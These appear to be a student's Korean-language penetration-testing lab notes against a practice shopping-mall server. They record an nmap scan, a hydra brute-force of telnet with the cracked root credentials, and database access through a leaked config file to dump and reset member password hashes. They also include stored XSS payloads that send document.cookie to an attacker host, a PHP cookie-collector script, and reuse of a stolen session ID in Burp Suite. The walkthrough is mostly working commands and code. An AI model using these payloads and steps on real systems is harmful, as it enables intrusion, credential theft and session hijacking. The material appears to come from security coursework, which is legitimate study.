kali대신 xshell 쓰고싶을 때 오류시 systemctl start ssh 확인하기 nmap -v -sS -O 192.168.0.127/32 => 포트 23,80,3306 열린 것 확인 hydra -l account.txt -P passwd.txt.1 192.168.0.127 telnet (board/p2puDN00) (root/1TLBB7Nz)
포트 23번 포트 80번 -> /var/www/html이 없음 (apache 경로 찾기) =>/usr/local/apache/htdocs vi index.html :q! 저장하지 않고 나가기 :wq 저장하고 나가기 (root/1TLBB7Nz)
cd /usr/local/apache/htdocs/nayamall/inc cat connect.inc => (shop/fnxm) cd /tmp cd /usr/local/mysql/bin ./mysql -u root -p shop
(shop/fnxm)
show tables;
desc paran_board_memeber;
select user_id,password,name,level from paran_board_member;
user_id | password | name | level |
+---------+------------------+------------+-------+
| admin | 30023cd66915635c | ¼¥° | 1 |
| exploit | 093021136d155fe7 | ¹ށ¦¿Ӡ| 8 |
| buycar | 1a4db7cd1cf355d5 | buycar | 1 |
| ggum | 446bcd2c0c82914f | ff | 8 |
| stu0 | 6678c4aa7dd72b33 | µ¿Ɇ | 8 |
=> 암호를 복호화하는 것은 거의 불가능...하므로... root 계정을 이용해 shop의 암호를 바꾸자!
192.168.0.127/nayamall/member_join.php
$join_query = ~~~password('$password') ~~~password()함수를 통해 저장되기 때문에 확인이 불가능하다
mysql
update paran_board_member set password('123456') where user_id='admin';
select user_id,password,name,level from paran_board_member;
< script>alert("");< /script>
//알림창 띄우기
< script>location.href='http://google.com';< /script>
//페이지 강제 이동
< script>alert(document.cookie);< /script>
//누른사람의 쿠키 자동 수집
< script>location.href='http://192.168.0.214/cookie.php?cookie='+document.cookie< /script>
//document. 자바에서 사용하는 함수
=> 위 스크립트를 작성글을 올려서 관리자가 글을 누르면 쿠키를 수집하고 다른 페이지로 이동(광고인척)하도록 php 짜기
cookie.php
< ?php
$cookie = $_GET['cookie'];
$file = '/home/kali/public_html/cookie.txt';
$handle = fopen($file, 'a');
fwrite($handle,"쿠키값\n");
fwrite($handle,"$cookie\n");
//파일닫기
fclose($handle);
?>
< script>window.location.href="https://google.com";< /script>
http://192.168.0.214/cookie.php?cookie=
=> cookie.txt파일로 확인할 수 있음
burpsuite로 쿠키값 넣어서 접속하기
교수님
PessionID=6636bec6c480439a7800c343a03397c8;
PHPSESSID=42d3b78c899c5aa4db7ef511869a6487 (안써도됨)
문제: 결제 설정에 은행명과 계좌번호는 무엇인가?
워니은행 000-1111-2222-3333 (주)산특